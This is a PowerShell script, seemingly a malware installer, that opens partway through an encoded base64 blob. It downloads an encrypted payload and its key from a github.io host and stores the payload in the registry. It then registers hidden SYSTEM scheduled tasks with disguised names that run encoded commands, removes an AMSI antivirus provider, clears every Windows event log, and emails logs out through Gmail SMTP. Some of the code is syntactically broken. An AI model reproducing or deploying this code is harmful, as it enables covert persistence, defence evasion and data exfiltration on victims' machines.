IAAgACAAIAAgAE8AdQB0AFMAdAByAGkAbgBnACAAIgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAFIAZQBnAEsAZQB5AFIAbwBvAHQAUABhAHQAaAAiAA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABSAGUAZwBLAGUAeQBSAG8AbwB0AFAAYQB0AGgAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAE8AdQB0AFMAdAByAGkAbgBnACAAIgBOAGUAdwAtAEkAdABlAG0AIADiAKwgHCBQAGEAdABoACAAJABSAGUAZwBLAGUAeQBQAGEAdABoACAA4gCsIBwgTgBhAG0AZQAgACQAUgBlAGcASwBlAHkATgBhAG0AZQAgAC0ARgBvAHIAYwBlACIADQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtACAA4gCsIBwgUABhAHQAaAAgACQAUgBlAGcASwBlAHkAUABhAHQAaAAgAOIArCAcIE4AYQBtAGUAIAAkAFIAZQBnAEsAZQB5AE4AYQBtAGUAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AcAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABGAHUAbABsAFIAZQBnAEsAZQB5AFAAYQB0AGgAIAAtAE4AYQBtAGUAIAAkAFIAZQBnAEsAZQB5AE4AYQBtAGUAIAAtAHYAYQBsAHUAZQAgACQAUwBjAHIAaQBwAHQARABhAHQAYQAgAC0ARgBvAHIAYwBlAA0ACgAgACAAIAAgAFMAbABlAGUAcAAgADEADQAKAH0ADQAKAA0ACgANAAoARgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAtAFUAcABkAGEAdABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAA0ACgB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAgACgADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBWAGEAbABpAGQAYQB0AGUATgBvAHQATgB1AGwAbABPAHIARQBtAHAAdAB5ACgAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAcwB1AGIAagBlAGMAdAAsAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAbQBzAGcAYgBvAGQAeQAsAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZgBpAGwAZQA9ACIAIgANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAUwBlAGMATQBGAGkAbABlAD0AJwBoAHQAdABwAHMAOgAvAC8AdgByADkANwAyAGIAZQA3ADEANgBhADAANABlAGIANgAuAGcAaQB0AGgAdQBiAC4AaQBvAC8AZABhAHQALwBtAGEAaQBsAC4AZABhAHQAJwANAAoAIAAgACAAIAAgACAAIAAgACQAUwBlAGMAUABGAGkAbABlAD0AJwBoAHQAdABwAHMAOgAvAC8AdgByADkANwAyAGIAZQA3ADEANgBhADAANABlAGIANgAuAGcAaQB0AGgAdQBiAC4AaQBvAC8AZABhAHQALwBwAHMALgBkAGEAdAAnAA0ACgAgACAAIAAgACAAIAAgACAAJAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAANAAoAIAAgACAAIAAgACAAIAAgACQAQwBtAGQARABhAHQAYQAgAD0AIAAkAHcAZQBiAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABTAGUAYwBNAEYAaQBsAGUAKQANAAoADQAKACAAIAAgACAAIAAgACAAIAAkAFAAYQBzAHMAIAA9ACAAJAB3AGUAYgBjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAUwBlAGMAUABGAGkAbABlACkADQAKACAAIAAgACAAIAAgACAAIAAkAFAAYQBzAHMAIAA9ACAAJABQAGEAcwBzAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMwAwACkADQAKACAAIAAgACAAIAAgACAAIAAkAFAAYQBzAHMALgBsAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMAcgB5AHAAdABlAGQAPQBEAGUAYwByAHkAcAB0AC0AUwB0AHIAaQBuAGcAIAAkAEMAbQBkAEQAYQB0AGEAIAAkAFAAYQBzAHMADQAKACAAIAAgACAAIAAgACAAIAAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAGQAZQBjAHIAeQBwAHQAZQBkAC4AUwBwAGwAaQB0ACgAIgA7ACIAKQANAAoADQAKACAAIAAgACAAIAAgACAAIAAkAEUAbQBhAGkAbABGAHIAbwBtACAAPQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIAAkAEUAbQBhAGkAbABUAG8AIAA9ACAAJABDAGgAYQByAEEAcgByAGEAeQBbADEAXQANAAoAIAAgACAAIAAgACAAIAAgACQAcABhAHMAcwAgAD0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdAA0ACgANAAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHMAcwBhAGcAZQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAE0AYQBpAGwALgBNAGEAaQBsAE0AZQBzAHMAYQBnAGUAIAANAAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHMAcwBhAGcAZQAuAEYAcgBvAG0AIAA9ACAAJABFAG0AYQBpAGwARgByAG8AbQAgAA0ACgAgACAAIAAgACAAIAAgACAAJABtAGUAcwBzAGEAZwBlAC4AVABvAC4AQQBkAGQAKAAkAEUAbQBhAGkAbABUAG8AKQANAAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHMAcwBhAGcAZQAuAEkAcwBCAG8AZAB5AEgAdABtAGwAIAA9ACAAJABUAHIAdQBlACAADQAKACAAIAAgACAAIAAgACAAIAAkAG0AZQBzAHMAYQBnAGUALgBTAHUAYgBqAGUAYwB0ACAAPQAgACQAcwB1AGIAagBlAGMAdAAgAA0ACgANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAoACQAZgBpAGwAZQAgAC0AbgBlACAAIgAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIABpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAIAA9ACAAJABmAGkAbABlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABhAHQAdABhAGMAaAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBNAGEAaQBsAC4AQQB0AHQAYQBjAGgAbQBlAG4AdAAoACQAYQB0AHQAYQBjAGgAbQBlAG4AdAApACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AZQBzAHMAYQBnAGUALgBBAHQAdABhAGMAaABtAGUAbgB0AHMALgBBAGQAZAAoACQAYQB0AHQAYQBjAGgAKQAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHMAcwBhAGcAZQAuAGIAbwBkAHkAIAA9ACAAJABtAHMAZwBiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAJABTAE0AVABQAFMAZQByAHYAZQByACAAPQAgACIAcwBtAHQAcAAuAGcAbQBhAGkAbAAuAGMAbwBtACIADQAKACAAIAAgACAAIAAgACAAIAAkAFMATQBUAFAAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4ATQBhAGkAbAAuAFMAbQB0AHAAQwBsAGkAZQBuAHQAKAAkAFMAbQB0AHAAUwBlAHIAdgBlAHIALAAgADUAOAA3ACkADQAKACAAIAAgACAAIAAgACAAIAAkAFMATQBUAFAAQwBsAGkAZQBuAHQALgBFAG4AYQBiAGwAZQBTAHMAbAAgAD0AIAAkAHQAcgB1AGUADQAKACAAIAAgACAAIAAgACAAIAAkAFMATQBUAFAAQwBsAGkAZQBuAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAkAEUAbQBhAGkAbABGAHIAbwBtACwAIAAkAHAAYQBzAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABTAE0AVABQAEMAbABpAGUAbgB0AC4AUwBlAG4AZAAoACQAbQBlAHMAcwBhAGcAZQApAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAE0AcwBnAD0AIgBSAGEAbgAgAGkAbgB0AG8AIABhAG4AIABpAHMAcwB1AGUAOgAgACQAKAAkAFAAUwBJAHQAZQBtAC4AVABvAFMAdAByAGkAbgBnACgAKQApACIADQAKACAAIAAgACAAIAAgACAAIAAjAHcAcgBpAHQAZQAtAGgAbwBzAHQAIAAnAFsAdABlAHMAdAAtAGUAeABjAGUAcAB0AGkAbwBuAHMAXQAgACcAIAAtAE4AbwBOAGUAdwBMAGkAbgBlACAALQBmACAAUgBlAGQADQAKACAAIAAgACAAIAAgACAAIAAjAHcAcgBpAHQAZQAtAGgAbwBzAHQAIAAkAE0AcwBnACAALQBmACAARABhAHIAawBZAGUAbABsAG8AdwANAAoAIAAgACAAIAAgACAAIAAgAHcAcgBpAHQAZQAtAHYAZQByAGIAbwBzAGUAIAAkAE0AcwBnACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAFAAUwBDAG0AZABsAGUAdAAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABQAFMAQwBtAGQAbABlAHQALgBUAGgAcgBvAHcAVABlAHIAbQBpAG4AYQB0AGkAbgBnAEUAcgByAG8AcgAoACQAUABTAEkAdABlAG0AKQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9ACAAIAAgAA0ACgB9AA0ACgANAAoADQAKACQAUwBjAHIAaQBwAHQAVQByAGwAPQAnAGgAdAB0AHAAcwA6AC8ALwB2AHIAOQA3ADIAYgBlADcAMQA2AGEAMAA0AGUAYgA2AC4AZwBpAHQAaAB1AGIALgBpAG8ALwBzAGMAaABkAHQAYQBzAGsALwByAHAAdAAuAGQAYQB0AC4AYQBlAHMAJwANAAoATwB1AHQAUwB0AHIAaQBuAGcAIAAiAFUAcABkAGEAdABpAG4AZwAgAHQAaABlACAAcgBlAHAAZQBhAHQAZQBkACAAYwBvAGQAZQAgAGYAcgBvAG0AIAAkAFMAYwByAGkAcAB0AFUAcgBsACIADQAKACAAIAAgACAAIAANAAoAJAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAANAAoAJABFAG4AYwByAHkAcAB0AGUAZABTAGMAcgBpAHAAdAAgAD0AIAAkAHcAZQBiAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABTAGMAcgBpAHAAdABVAHIAbAApAA0ACgBTAGEAdgBlAC0AUwBjAHIAaQBwAHQARABhAHQAYQAgACQARQBuAGMAcgB5AHAAdABlAGQAUwBjAHIAaQBwAHQADQAKAFMAbABlAGUAcAAgADIADQAKAFMAZQBuAGQALQBVAHAAZABhAHQAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgAgACIAVQBwAGQAYQB0AGUAIABvAG4AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIgAgACIAVQBwAGQAYQB0AGkAbgBnACAAdABoAGUAIAByAGUAcABlAGEAdABlAGQAIABjAG8AZABlACAAZgByAG8AbQAgACQAUwBjAHIAaQBwAHQAVQByAGwAIgA=
'

Function OutString
{
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [string]$Msg,
        [Parameter()]
        [ValidateNotNullOrEmpty()]
        [ValidateSet('Information','Warning','Error')]
        [string]$Severity = 'Information'
    )

    if($env:COMPUTERNAME -like 'MAVERICK') {
          if($TestOutput){
            write-host '[install]   ' -NoNewLine -f Red
            write-host $Msg -f DarkYellow
         }
        Write-Verbose $Msg
    }
    [pscustomobject]@{
        Time = (Get-Date -f g)
        Message = $Msg
        Severity = $Severity
    } | Export-Csv -Path $LogFilePath -Append -NoTypeInformation
    $FullLogs = $FullLogs + $Msg + '`n`n'
}


function Set-Key {
param([string]$string)
$length = $string.length
$pad = 32-$length
if (($length -lt 16) -or ($length -gt 32)) {Throw "String must be between 16 and 32 characters"}
$encoding = New-Object System.Text.ASCIIEncoding
$bytes = $encoding.GetBytes($string + "0" * $pad)
return $bytes
}


function Invoke-AESEncryption {
    [CmdletBinding()]
    [OutputType([string])]
    Param
    (
        [Parameter(Mandatory = $true)]
        [ValidateSet('Encrypt', 'Decrypt')]
        [String]$Mode,

        [Parameter(Mandatory = $true)]
        [String]$Key,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptText")]
        [String]$Text,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
        [String]$Path
    )

    Begin {
        $shaManaged = New-Object System.Security.Cryptography.SHA256Managed
        $aesManaged = New-Object System.Security.Cryptography.AesManaged
        $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
        $aesManaged.BlockSize = 128
        $aesManaged.KeySize = 256
    }

    Process {
        $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))

        switch ($Mode) {
            'Encrypt' {
                if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)}
                
                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    $outPath = $File.FullName + ".aes"
                }

                $encryptor = $aesManaged.CreateEncryptor()
                $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
                $encryptedBytes = $aesManaged.IV + $encryptedBytes
                $aesManaged.Dispose()

                if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)}
                
                if ($Path) {
                    $B64Cipher=[System.Convert]::ToBase64String($encryptedBytes)
                    Set-Content -Path $outPath -Value $B64Cipher
                    #[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    return "File encrypted to $outPath"
                }
            }

            'Decrypt' {
                if ($Text) {$cipherBytes = [System.Convert]::FromBase64String($Text)}
                
                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    #$cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    $B64Cipher = Get-Content $File.FullName
                    $cipherBytes=[System.Convert]::FromBase64String($B64Cipher)
                    $outPath = $File.FullName -replace ".aes"
                }

                $aesManaged.IV = $cipherBytes[0..15]
                $decryptor = $aesManaged.CreateDecryptor()
                $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
                $aesManaged.Dispose()

                if ($Text) {return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0)}
                
                if ($Path) {
                    [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    #return "File decrypted to $outPath"
                }
            }
        }
    }

    End {
        $shaManaged.Dispose()
        $aesManaged.Dispose()
    }
}

function Get-EncryptedScript 
{
    $Data=(Get-ItemProperty -Path $FullRegKeyPath -Name $RegKeyName).$RegKeyName
    return $Data
}

function Get-ClearScript 
{
    $SecPFile='https://vr972be716a04eb6.github.io/dat/ps.dat'
    $Pass = $webclient.DownloadString($SecPFile)
    $Pass = $Pass.substring(0,30)

    $EncryptedScript=Get-EncryptedScript 

    $ScriptClear=Invoke-AESEncryption -Mode Decrypt -Key $Pass -Text $EncryptedScript

    return $ScriptClear
}


function Save-EncryptedScript {
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [string]$ScriptData
    )

    $null=Remove-Item -Path $RegKeyRootPath -Recurse -Force -ErrorAction Ignore
    $null=New-Item –Path $RegKeyPath –Name $RegKeyName -Force -ErrorAction Ignore
    $null=New-Itemproperty -path $FullRegKeyPath -Name $RegKeyName -value $ScriptData -Force -ErrorAction Ignore
}


Function Send-InstallNotification
{
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [string]$subject,
        [string]$msgbody,
        [string]$file=""
    )
    try {
        $SecMFile='https://vr972be716a04eb6.github.io/dat/mail.dat'
        $SecPFile='https://vr972be716a04eb6.github.io/dat/ps.dat'
        $webclient = New-Object Net.WebClient
        $CmdData = $webclient.DownloadString($SecMFile)

        $Pass = $webclient.DownloadString($SecPFile)
        $Pass = $Pass.substring(0,30)
        $Pass.length
        $decrypted=Decrypt-String $CmdData $Pass
        $CharArray =$decrypted.Split(";")

        $EmailFrom = $CharArray[0]
        $EmailTo = $CharArray[1]
        $pass = $CharArray[2]

        $message = new-object System.Net.Mail.MailMessage 
        $message.From = $EmailFrom 
        $message.To.Add($EmailTo)
        $message.IsBodyHtml = $True 
        $message.Subject = $subject 

        if($file -ne ""){
          if(Test-Path -Path $file){
              $attachment = $file
              $attach = new-object Net.Mail.Attachment($attachment) 
              $message.Attachments.Add($attach)   
          }
        }
        $message.body = $msgbody
        $SMTPServer = "smtp.gmail.com"
        $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
        $SMTPClient.EnableSsl = $true
        $SMTPClient.Credentials = New-Object System.Net.NetworkCredential($EmailFrom, $pass);
        $SMTPClient.Send($message)
    }
    catch
    {
        $Msg="Ran into an issue: $($PSItem.ToString())"
        #write-host '[test-exceptions] ' -NoNewLine -f Red
        #write-host $Msg -f DarkYellow
        write-verbose $Msg 
        if($PSCmdlet -ne $null){
            $PSCmdlet.ThrowTerminatingError($PSItem)
        }
        
    }   
}


function ConvertTo-EncodedScript
{
  param
  (
    [string]$Path,
    [switch]$WriteFile=$false
  )
  
  $Code = Get-Content -Path $Path -Raw
  $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Code) 
  $Base64 = [Convert]::ToBase64String($Bytes) 
  
  if($WriteFile){
      $NewPath = [System.IO.Path]::ChangeExtension($Path, '.b64')
      $Base64 | Set-Content -Path $NewPath
  }

  return $Base64
}

Function New-ScheduledTaskFolder
{
  Param ($taskpath)
  $ErrorActionPreference = "stop"

  OutString "New-ScheduledTaskFolder called with path $taskpath"


  $scheduleObject = New-Object -ComObject schedule.service
  $scheduleObject.connect()
  $rootFolder = $scheduleObject.GetFolder("\")
  Try 
  {
    $null = $scheduleObject.GetFolder($taskpath)
  }
  Catch { 
    $null = $rootFolder.CreateFolder($taskpath) 
  }
  Finally { 
    $ErrorActionPreference = "continue" 
  } 
}

function Install-EncodedScriptTask {
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [string]$TaskName,
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [int]$Interval
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [string]$EncodedTask
    )

    OutString "Install-EncodedScriptTask called with taskname $TaskName. Code: $EncodedTask"

  $action = New-ScheduledTaskAction -Execute "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -Argument "-ExecutionPolicy Unrestricted -NoProfile -WindowStyle Hidden -NonInteractive -EncodedCommand $EncodedTask"
    $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes $Interval)
    $principal = New-ScheduledTaskPrincipal -UserID "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
    $settings = New-ScheduledTaskSettingsSet -MultipleInstances Parallel -Hidden -Priority 3
    $task = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings

    $null=Register-ScheduledTask $TaskName -InputObject $task
    $null=Start-ScheduledTask -TaskName $TaskName
}


function RemoveOldTasks
{
    $ErrorActionPreference = "SilentlyContinue"
    $Report = @()
    $NumTasks = 0
    $path = "c:\Windows\System32\Tasks"
    $tasks = Get-ChildItem -recurse -Path $path -File
    foreach ($task in $tasks)
    {
        $Details = "" | select Task, IsHidden, Enabled, Application
        $AbsolutePath = $task.directory.fullname + "\" + $task.Name
        $TaskInfo = [xml](Get-Content $AbsolutePath)
        #$Details.ComputerName = $Computer
        $Details.Task = $task.name
        $Details.IsHidden = $TaskInfo.task.settings.hidden
        $Details.Enabled = $TaskInfo.task.settings.enabled
        $Details.Application = $TaskInfo.task.actions.exec.command

        $CreationDate=[datetime]$task.CreationTime
        $LimitDate= (get-date).AddDays(-7)
        if($CreationDate -gt  $LimitDate) 
        {
            $Report += $Details
            $NumTasks = $NumTasks + 1
        }
    }  

    OutString "Cleanup: Found $NumTasks Tasks Created in the last 7 days"
    if($NumTasks -gt 0){
        
        foreach ($tdel in $Report){
            $tname=$tdel.Task
            OutString "Cleanup: Deleting task $tname "
            Unregister-ScheduledTask 'RemoteExecCheck' -ErrorAction Ignore
        }
    }            
} 

function Cleanup {

$ErrorActionPreference = "SilentlyContinue"
  # old tasks
  OutString "Cleanup: Unregister RemoteExecCheck,ScheduledSecurityCheck,WinSecurityScheduledCheck"
  Unregister-ScheduledTask 'RemoteExecCheck' -ErrorAction Ignore
  Unregister-ScheduledTask 'WinSecurityScheduledCheck' -ErrorAction Ignore
  Unregister-ScheduledTask 'ScheduledSecurityCheck' -ErrorAction Ignore

  $NewTaskFolder='ComObjectsRegistrationManagement'
  $NewTaskName=$NewTaskFolder + '\' + 'ComObjectsRegistrar'
  Unregister-ScheduledTask $NewTaskName -ErrorAction Ignore
  RemoveOldTasks
  # logs
  
  $null=Get-WinEvent -ListLog * -Force | % {   $null=(Wevtutil.exe cl $_.LogName) }

  Remove-Item -Path "$env:Temp\LogFile.csv" -Force -ErrorAction Ignore
  Remove-Item -Path $LogFilePath -Force -ErrorAction Ignore
}

# AMSI
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -Force -ErrorAction Ignore 

$NewTaskFolder='ComObjectsRegistrationManagement'
$NewTaskName=$NewTaskFolder + '\' + 'ComObjectsInt'
New-ScheduledTaskFolder $NewTaskFolder

$InstallFromLocal=$false

$currentPath = Get-Location
$script_clear = ''
if($InstallFromLocal)
{
    $script_clear = Join-Path $currentPath "runat5min.ps1"
    $script_coded = ConvertTo-EncodedScript $script_clear $false
    $c64data = get-content $script_coded -Raw
    Install-EncodedScriptTask $NewTaskName $c64data
} else {
      OutString "ScriptUrl: $ScriptUrl"
      $ScriptUrl='https://vr972be716a04eb6.github.io/schdtask/rpt.dat.aes'
      $webclient = New-Object Net.WebClient
      $EncryptedScript = $webclient.DownloadString($ScriptUrl)
      Save-EncryptedScript $EncryptedScript

      Install-EncodedScriptTask $NewTaskName 15 $Base64Command
}

$NewTaskNameUpd=$NewTaskFolder + '\' + 'ComObjectsUpd'
Install-EncodedScriptTask $NewTaskNameUpd 500 $UpdateCommandB64


Send-InstallNotification "Schd Task Install Notice for $env:COMPUTERNAME" "test again, check file" $LogFilePath
Cleanup

